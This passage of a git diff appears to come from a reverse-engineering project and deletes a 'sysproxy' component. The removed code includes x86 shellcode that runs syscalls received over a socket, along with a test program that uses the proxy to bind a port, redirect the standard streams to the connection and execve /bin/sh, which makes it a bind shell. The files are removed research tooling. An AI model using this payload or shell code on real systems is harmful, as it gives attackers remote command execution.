else { - /* environment */ - r.edx = 0; - } - - args = (struct arg **)malloc(sizeof(struct arg *) * \ - (args_len + env_len + 1)); - - if(args == NULL) - return -ENOMEM; - - arg = (struct arg *)malloc(sizeof(struct arg) * \ - (args_len + env_len + 1)); - - if(arg == NULL) - goto err_exec; - - /* buffer argument */ - arg[0].len = file_len; - arg[0].buf = f; - args[0] = &arg[0]; - - if(args_len) { - /* arguments array */ - args_p = (char **)malloc((args_len + 1) * sizeof(char *)); - if(args_p == NULL) - goto err_exec; - - args_p[args_len] = 0; - - arg[n_args].len = args_len * sizeof(char *); - arg[n_args].buf = (char *)args_p; - args[n_args] = &arg[n_args]; - - n_args++; - } - - if(env_len) { - /* environment array */ - env_p = (char **)malloc((env_len + 1) * sizeof(char *)); - if(env_p == NULL) - goto err_exec; - - env_p[env_len] = 0; - - arg[n_args].len = env_len * sizeof(char *); - arg[n_args].buf = (char *)env_p; - args[n_args] = &arg[n_args]; - - n_args++; - } - - off = sizeof(r) + file_len + (args_len) * sizeof(char *) + \ - (env_len) * sizeof(char *); - - /* arguments */ - for(i = 0; i < args_len - 1; i++, n_args++) { - arg[n_args].len = strlen(argv[i]) + 1; - arg[n_args].buf = argv[i]; - args[n_args] = &arg[n_args]; - args_p[i] = (char *)rpc_reloc(off); - off += arg[n_args].len; - } - - /* environment */ - for(i = 0; i < env_len - 1; i++, n_args++) { - arg[n_args].len = strlen(env[i]) + 1; - arg[n_args].buf = env[i]; - args[n_args] = &arg[n_args]; - env_p[i] = (char *)rpc_reloc(off); - off += arg[n_args].len; - } - - ret = rpc_syscall(&r, args, n_args); - -err_exec: - - free(args); - if(arg) - free(arg); - - if(env_p) - free(env_p); - - if(args_p) - free(args_p); - - return ret; -} - -int sys_dup2(int o, int n) -{ - struct regs r; - - memset(&r, 0, sizeof(r)); - r.eax = 0x3f; - r.ebx = o; - r.ecx = n; - - return rpc_syscall(&r, NULL, 0); -} - -int sys_close(int d) -{ - struct regs r; - - memset(&r, 0, sizeof(r)); - r.eax = 6; - r.ebx = d; - - return rpc_syscall(&r, NULL, 0); -} diff --git a/libr/sysproxy/syscall.S b/libr/sysproxy/syscall.S deleted file mode 100644 index f49b27bec5..0000000000 --- a/libr/sysproxy/syscall.S +++ /dev/null @@ -1,67 +0,0 @@ -.code32 -.global process_syscall, len_shcode - -# th0rpe - 08-27-2007 - -process_syscall: - -#ifdef LISTENER_TCP -#include "listeners/lis_socket_tcp.S" -#else -/* for testing you must compile with 'test_srv.c' */ -#include "listeners/getsock.S" -#endif - -# save connection descriptor - pushl %ebx - -# alloc space for syscalls packet - subl $2048, %esp - -# write buffer address -write_buffer: - movl %esp, %ecx - - movl %esp, (%ecx) - movl $4, %edx - movl %edx, %eax - int $0x80 - -read_request: - # read request - movl %esp, %ecx - movl $2048, %edx - movl $3, %eax - int $0x80 - - # check minimal length - cmpl $32,%eax - jl err_process - - # exec syscall - popal -exec_syscall: - int $0x80 - - # restore stack pointer - subl $32, %esp - - # save eax result - movl %eax, 28(%esp) - -# write response - movl %esp, %ecx - movl $2048, %edx -# restore ebx register with connecion descriptor - movl 2048(%esp), %ebx - movl $4, %eax - int $0x80 - -jmp read_request - -err_process: - movl $0xfc,%eax - int $0x80 - -len_shcode: - .long len_shcode - process_syscall diff --git a/libr/sysproxy/syscall.c b/libr/sysproxy/syscall.c deleted file mode 100644 index 2a9bf5a4c4..0000000000 --- a/libr/sysproxy/syscall.c +++ /dev/null @@ -1,5 +0,0 @@ -/* Hacky way to bypass make(1) and waf(X) build */ -#ifndef MKPFX -#define MKPFX "" -#endif -asm(".include \""MKPFX"../src/rasc/syscall.S\""); diff --git a/libr/sysproxy/test_sp.c b/libr/sysproxy/test_sp.c deleted file mode 100644 index 8239ba4e59..0000000000 --- a/libr/sysproxy/test_sp.c +++ /dev/null @@ -1,45 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include "sp.h" - -#include -#include -#include - -#define RPC_HOST "127.0.0.1" -#define RPC_PORT 8181 - -int main(int argc, char **argv) -{ - int fd, l, con, opt = 1; - struct sockaddr_in in, in1; - char *arg[] = {"/bin/sh", 0}; - - l = sizeof(in1); - - memset(&in, 0, sizeof(in)); - in.sin_port = htons(3223); - in.sin_family = AF_INET; - - rpc_init(RPC_HOST, RPC_PORT); - - fd = sys_socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); - printf("socket: %i\n", fd); - printf("setsockopt: %i\n", setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, \ - &opt, sizeof(opt))); - printf("bind: %i\n", sys_bind(fd, &in, sizeof(in))); - printf("listen: %i\n", sys_listen(fd, 5)); - con = sys_accept(fd, &in1, &l); - printf("accept: %i\n", con); - printf("dup2: %i\n", sys_dup2(con, 0)); - printf("dup2: %i\n", sys_dup2(con, 1)); - printf("dup2: %i\n", sys_dup2(con, 2)); - sys_execve(arg[0], arg, 0); - - return 0; -} diff --git a/libr/sysproxy/test_srv.c b/libr/sysproxy/test_srv.c deleted file mode 100644 index ffeb51634c..0000000000 --- a/libr/sysproxy/test_srv.c +++ /dev/null @@ -1,67 +0,0 @@ -#include -#include -#include -#include -#include -#include - -#define SRV_PORT 8181 - -/* test with getsockname() shellcode */ - -extern void process_syscall(); - -void init_srv_sp() -{ - struct sockaddr_in in, l; - int srv; - int con; - int len; - int opt; - int t; - - memset(&in, 0, sizeof(in)); - in.sin_port = htons(SRV_PORT); - in.sin_family = AF_INET; - - srv = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); - if(srv < 0) { - perror("socket"); - exit(1); - } - - opt = 1; - if(setsockopt(srv, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) < 0) { - perror("setsockopt"); - exit(1); - } - - - len = sizeof(in); - if(bind(srv, (struct sockaddr *)&in, sizeof(in)) < 0) { - perror("bind"); - exit(1); - } - - listen(srv, 5); - while((con = accept(srv, (struct sockaddr *)&in, - &len)) > 0) { - int pid; - - pid = fork(); - if(pid == 0) { - close(srv); - printf("con: %i\n", con); - process_syscall(); - } else { - close(con); - } - } -} - -int main(int argc, char **argv) -{ - printf("Esperant conexions rpc al port 8181\n"); - init_srv_sp(); - return 0; -} diff --git a/libr/sysproxy/test_srv1.c b/libr/sysproxy/test_srv1.c deleted file mode 100644 index e3faa8e965..0000000000 --- a/libr/sysproxy/test_srv1.c +++ /dev/null @@ -1,11 +0,0 @@ -/* test with server socket shellcode */ -#include - -extern void process_syscall(); - -int main(int argc, char **argv) -{ - printf("Esperant rpc al port 8181...\n"); - process_syscall(); - return 0; -}